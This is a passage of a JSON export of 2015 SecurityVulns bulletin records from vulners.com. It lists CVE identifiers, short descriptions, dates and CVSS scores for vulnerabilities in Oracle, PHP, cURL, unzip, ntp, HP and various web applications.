"CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "cvelist": ["CVE-2015-3236", "CVE-2015-3153", "CVE-2015-3144", "CVE-2015-3237", "CVE-2014-0015", "CVE-2015-3145", "CVE-2015-3143", "CVE-2015-3148"], "description": "Request may be sent via wrong connection if NTLM authentication is used. Information disclosure, DoS.", "edition": 1, "modified": "2015-11-01T00:00:00", "published": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:13544", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13544", "title": "cURL security vulnerabilitiies", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7696", "CVE-2015-7697"], "description": "DoS, code execution.", "edition": 1, "modified": "2015-11-01T00:00:00", "published": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:14752", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14752", "title": "unzip security vulneravilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-5219", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7691", "CVE-2015-5196", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-5195", "CVE-2015-7850", "CVE-2015-7853"], "description": "Multiple memory corruptions.", "edition": 1, "modified": "2015-11-01T00:00:00", "published": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:14751", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14751", "title": "ntp multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7377", "CVE-2015-6000", "CVE-2015-5075", "CVE-2015-7390", "CVE-2015-6544", "CVE-2015-7668", "CVE-2015-5715", "CVE-2015-7373", "CVE-2015-6659", "CVE-2015-5956", "CVE-2015-3623", "CVE-2015-6660", "CVE-2015-7682", "CVE-2015-5723", "CVE-2015-7368", "CVE-2015-7319", "CVE-2015-7299", "CVE-2015-7669", "CVE-2015-5071", "CVE-2015-7371", "CVE-2015-7320", "CVE-2015-6497", "CVE-2015-4499", "CVE-2015-7683", "CVE-2015-7367", "CVE-2014-8778", "CVE-2015-7670", "CVE-2015-7391", "CVE-2015-7372", "CVE-2015-7366", "CVE-2015-7364", "CVE-2015-7667", "CVE-2015-5072", "CVE-2015-6545", "CVE-2015-7370", "CVE-2015-7666", "CVE-2015-6658", "CVE-2015-6576", "CVE-2015-5076", "CVE-2015-6584", "CVE-2015-5074", "CVE-2015-5603", "CVE-2015-7365", "CVE-2015-6661", "CVE-2015-7369", "CVE-2015-5714", "CVE-2015-6665"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14750", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14750", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-5448"], "description": "No description provided", "edition": 1, "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14749", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14749", "title": "HP Asset Manager information disclosure", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-2136", "CVE-2015-6029"], "description": "Authentication bypass, information disclosure.", "edition": 1, "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14693", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14693", "title": "HP ArcSight Logger security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}
